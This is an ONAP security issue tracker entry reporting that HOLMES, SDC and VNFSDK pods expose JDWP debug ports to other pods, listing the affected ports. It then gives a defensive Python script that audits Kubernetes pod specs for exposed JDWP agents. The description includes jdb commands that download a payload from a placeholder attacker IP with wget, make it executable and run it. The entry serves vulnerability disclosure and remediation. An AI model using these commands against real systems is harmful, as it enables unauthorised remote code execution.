ONAP JIRA Security Issues: OJSI-10

Some ONAP services expose JDWP outside of the pod, which allows arbitrary code execution


Details

    • Type: Epic
    • Status: Confirmed
    • Priority: High
    • Resolution: Unresolved
    • None
    • El Alto Release
    • JDWP exposure

    Description

      The JDWP protocol exposed outside of the pod allows arbitrary code execution
      using the snippet below (jdb commands):
      print new java.lang.Runtime().exec("wget http://<attackerip>/payload")
      print new java.lang.Runtime().exec("chmod +x payload")
      print new java.lang.Runtime().exec("./payload")


      Impact description (draft)

      Title: Some ONAP services expose JDWP outside of the pod, which allows arbitrary code execution

      Reporter: Radosław Żeszczuk from Samsung

      Products: HOLMES, SDC, VNFSDK

      Affects: Dublin and earlier, Casablanca and earlier (depending on a product)

      Description:

      Radosław Żeszczuk from Samsung reported a number of vulnerabilities in HOLMES, SDC and VNFSDK. By accessing the following ports:

      • 9202 of dep-holmes-engine-mgmt pod (before Dublin)
      • 4000 of demo-sdc-sdc-be pod
      • 6000 of demo-sdc-sdc-fe pod
      • 4001 of demo-sdc-sdc-onboarding-be pod
      • 7001 of demo-sdc-sdc-wfd-be pod
      • 7000 of demo-sdc-sdc-wfd-fe pod
      • 8000 of demo-vnfsdk-vnfsdk

      an unauthenticated attacker who already has access to pod-to-pod communication may execute arbitrary code inside those pods. All OOM ONAP setups are affected.
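The root cause in each affected product is a JVM started with the JDWP debug agent listening on an interface reachable from other pods. The following is an added example, not ONAP project code: a small audit script that scans a Kubernetes pod spec for JVM containers whose JDWP agent (`-agentlib:jdwp=...` or legacy `-Xrunjdwp:...`) listens on a non-loopback address, and that rewrites the agent options to bind loopback only. The pod spec it scans is constructed for illustration (the pod name is borrowed from the list above, the container names and flags are invented); the JDK version parameter exists because a bare `address=port` listens on every interface on JDK 8 and earlier but on loopback only from JDK 9 on.

```python
"""Audit Kubernetes pod specs for JDWP agents reachable from other pods.

Added example, not ONAP code. SAMPLE_POD is a constructed manifest.
"""
import re
from typing import Dict, List

# Debug agent option string, e.g.
#   -agentlib:jdwp=transport=dt_socket,server=y,suspend=n,address=*:4000
# or the legacy -Xrunjdwp:transport=dt_socket,... form.
JDWP_RE = re.compile(r"-(?:agentlib:jdwp=|Xrunjdwp:)([^\s'\"]+)")

LOOPBACK = {"127.0.0.1", "localhost", "::1", "[::1]"}


def parse_jdwp_options(opts: str) -> Dict[str, str]:
    """Split 'transport=dt_socket,server=y,address=*:4000' into a dict."""
    parsed: Dict[str, str] = {}
    for part in opts.split(","):
        key, sep, value = part.partition("=")
        if sep:
            parsed[key.strip()] = value.strip()
    return parsed


def jdwp_bind_host(address: str, jdk_major: int = 8) -> str:
    """Return the interface a listening (server=y) JDWP agent binds to.

    'host:port' binds to host and '*:port' to every interface. A bare 'port'
    (or no address at all) binds to every interface on JDK 8 and earlier,
    but only to loopback from JDK 9 on, so the JDK major version decides.
    """
    if ":" not in address:
        return "*" if jdk_major < 9 else "localhost"
    host = address.rpartition(":")[0]
    return host or "*"


def find_jdwp_exposures(pod: dict, jdk_major: int = 8) -> List[dict]:
    """One finding per container whose JDWP agent other pods could reach."""
    findings = []
    pod_name = pod.get("metadata", {}).get("name", "?")
    for container in pod.get("spec", {}).get("containers", []):
        # JVM flags normally arrive via command/args or JAVA_OPTIONS-style env vars.
        texts = list(container.get("command", [])) + list(container.get("args", []))
        texts += [env.get("value", "") for env in container.get("env", [])]
        for text in texts:
            for match in JDWP_RE.finditer(text):
                opts = parse_jdwp_options(match.group(1))
                if opts.get("transport") != "dt_socket":
                    continue  # dt_shmem is not reachable over the network
                if opts.get("server", "n") != "y":
                    continue  # server=n: the JVM dials out, nothing listens
                host = jdwp_bind_host(opts.get("address", ""), jdk_major)
                if host in LOOPBACK:
                    continue  # only reachable inside the pod's network namespace
                findings.append({"pod": pod_name,
                                 "container": container.get("name", "?"),
                                 "address": opts.get("address", ""),
                                 "bind_host": host})
    return findings


def harden_jdwp_options(opts: str) -> str:
    """Rewrite the agent options so the listener binds to 127.0.0.1 only.

    Dropping the agent from production images is the better fix; this is the
    minimal change when a debug port must stay for in-pod use (kubectl exec).
    """
    parsed = parse_jdwp_options(opts)
    port = parsed.get("address", "").rpartition(":")[2]
    if not port:
        raise ValueError("JDWP address has no explicit port to preserve")
    parsed["address"] = f"127.0.0.1:{port}"
    return ",".join(f"{k}={v}" for k, v in parsed.items())


# Constructed pod spec: the pod name follows the advisory, the rest is made up.
SAMPLE_POD = {
    "metadata": {"name": "demo-sdc-sdc-be"},
    "spec": {"containers": [
        {"name": "sdc-be",
         "env": [{"name": "JAVA_OPTIONS",
                  "value": "-Xmx1g -agentlib:jdwp=transport=dt_socket,"
                           "server=y,suspend=n,address=4000"}],
         "ports": [{"containerPort": 8080}, {"containerPort": 4000}]},
        {"name": "sidecar-jvm",
         "args": ["java", "-agentlib:jdwp=transport=dt_socket,server=y,"
                          "suspend=n,address=127.0.0.1:5005", "-jar", "app.jar"]},
        {"name": "no-debug", "args": ["java", "-jar", "app.jar"]},
    ]},
}

if __name__ == "__main__":
    for finding in find_jdwp_exposures(SAMPLE_POD):
        print(f"{finding['pod']}/{finding['container']}: JDWP listens on "
              f"{finding['bind_host']} (address={finding['address']})")
        print("  hardened:", harden_jdwp_options(
            "transport=dt_socket,server=y,suspend=n,address=" + finding["address"]))
```

Run against real manifests by feeding `kubectl get pod -o json` output (the `items[]` entries) to `find_jdwp_exposures`. Binding the agent to loopback removes the pod-to-pod reachability this issue describes; a NetworkPolicy that denies ingress to the debug ports is a complementary control, but the agent should not ship in production images at all.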


          People

            kopasiak Krzysztof Opasiak
            mtnskiier Jim Baker